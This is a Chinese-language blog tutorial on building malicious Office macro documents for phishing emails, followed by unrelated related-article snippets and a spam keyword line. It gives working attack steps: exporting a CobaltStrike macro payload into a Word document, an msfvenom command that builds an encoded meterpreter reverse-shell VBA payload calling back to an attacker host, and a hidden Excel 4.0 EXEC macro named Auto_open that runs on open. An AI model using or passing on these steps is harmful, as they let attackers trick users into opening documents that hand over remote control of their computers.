<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    釣魚郵件之office宏攻擊

    VSole2021-11-03 06:38:44

    前言

    office宏攻擊是釣魚郵件場景中最常見的攻擊手段,其制作簡單,兼容性強,非常適合批量攻擊,但由于其需要用戶交互,隱蔽性差,攻擊能否成功基本取決于目標的安全意識強弱。

    宏病毒

    office宏病毒一般寄存于office文檔中,如word,excel,ppt,以excel最常見,當用戶打開這種文檔時,內置的宏命令就會執行,在計算機中執行惡意命令。

    一般的惡意命令會自動訪問提前部署好的惡意服務器下載木馬程序到本地并運行,從而控制計算機。

    攻擊示例

    CobaltStrike生成office宏病毒

    使用CobaltStrike的宏病毒生成功能可以輕松生成惡意宏代碼,部署CobaltStrike服務器并打開客戶端,創建一個監聽器

    然后點擊Attacks-Package-MS Office Macro-選定監聽器-生成對應的宏病毒-復制到剪貼板

    然后創建一個新word-視圖-查看宏中新建一個宏名

    在里面粘貼剛才復制的宏,并在保存時點擊否另存為.doxm文件

    當打開word文檔并點擊啟用宏代碼時,就會觸發宏,反彈shell到Cobalt Strike中

    msf生成vba文件

    使用msf生成vba文件:

    msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=xx.xx.xx.xx lport=4444 -f vba -o 123.vba
    

    后面的步驟與CobaltStrike中相似,創建一個新word-視圖-查看宏中新建一個宏名

    在里面粘貼剛才復制的宏,并在保存時點擊否另存為.doxm文件

    當打開word文檔并點擊啟用宏代碼時,就會觸發宏,反彈shell到msf中

    使用excel4.0宏執行命令

    創建一個word或excel文檔,如果是word需要插入excel工作表

    右鍵點擊底部的sheet-插入,選擇MS Excel 4.0宏表

    在表格中寫入= EXEC(“calc.exe”)

    點擊此格,將單元格命名為Auto_open,并可以將此sheet右鍵隱藏,重新打開word文檔將會自動執行命令。

    在excel中嵌入宏代碼

    excel中可以直接嵌入dde指令,參考csv注入中的攻擊方式即可。

    參考文檔:http://uuzdaisuki.com/2020/07/16/csv%E6%B3%A8%E5%85%A5%E5%88%A9%E7%94%A8%E5%92%8C%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/

    電子表格釣魚郵件
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    退稅補貼詐騙新手段!
    近年來,網絡釣魚電子郵件越來越普遍,也越來越難檢測。事實上,網絡釣魚是 2020年最常見的在線欺詐類型,有近
    退稅補貼詐騙新手段
    出于財務動機的黑客組織FIN11已經開始傳播勒索軟件,以將其網絡犯罪活動貨幣化。在最近的攻擊中,觀察到該組織將Clop勒索軟件部署到其受害者的網絡中。FireEye的Mandiant的研究人員觀察到FIN11黑客使用魚叉式網絡釣魚消息分發了名為FRIENDSPEAK的惡意軟件下載器。專家指出,丟棄了Clop勒索軟件之后的FIN11參與者在失去訪問權限后并沒有放棄目標,至少在一種情況下,幾個月后他們再次破壞了目標組織。
    據廣東省通信管理局網站消息,廣東省通信管理局5月12日發布了《關于勒索病毒對關鍵信息基礎設施威脅的預警通報》。例如在 2020 年的 8 月和 11 月,多家傳統企業就先后遭到勒索病毒的攻擊,勒索團伙均要求企業支付高額贖金,否則將把盜竊數據在暗網出售。從勒索病毒感染的行業來看,數據價值較高的傳統行業、醫療、政府機關遭受攻擊較為嚴重,依次占比為37%、18%、14%,總計占比高達69%。
    病毒很有耐心的逐步擴散,一點一點的進行破壞。Duqu主要收集工業控制系統的情報數據和資產信息,為攻擊者提供下一步攻擊的必要信息。夜龍攻擊 夜龍攻擊是McAfee在2011年2月份發現并命名的針對全球主要能源公司的攻擊行為。
    用戶名:加密密碼:密碼最后一次修改日期:兩次密碼的修改時間間隔:密碼有效期:密碼修改到期到的警告天數:密碼過期之后的寬限天數:賬號失效時間:保留。查看下pid所對應的進程文件路徑,
    當前,以數字經濟為代表的新經濟成為經濟增長新引擎,數據作為核心生產要素成為了基礎戰略資源,數據安全的基礎保障作用也日益凸顯。伴隨而來的數據安全風險與日俱增,數據泄露、數據濫用等安全事件頻發,為個人隱私、企業商業秘密、國家重要數據等帶來了嚴重的安全隱患。近年來,國家對數據安全與個人信息保護進行了前瞻性戰略部署,開展了系統性的頂層設計。《中華人民共和國數據安全法》于2021年9月1日正式施行,《中華人
    “我們觀察到惡意行為者在諸如 Google Sites,Box 和 Quip(在本例中)之類的合法服務上托管網絡釣魚頁面的持續趨勢。”?“這些服務大多數都具有免費版本,并且易于使用,這使它們對世界各地的數百萬人都是有益的,但不幸的是,這也降低了網絡犯罪分子發起成功的網絡釣魚攻擊的門檻。”
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类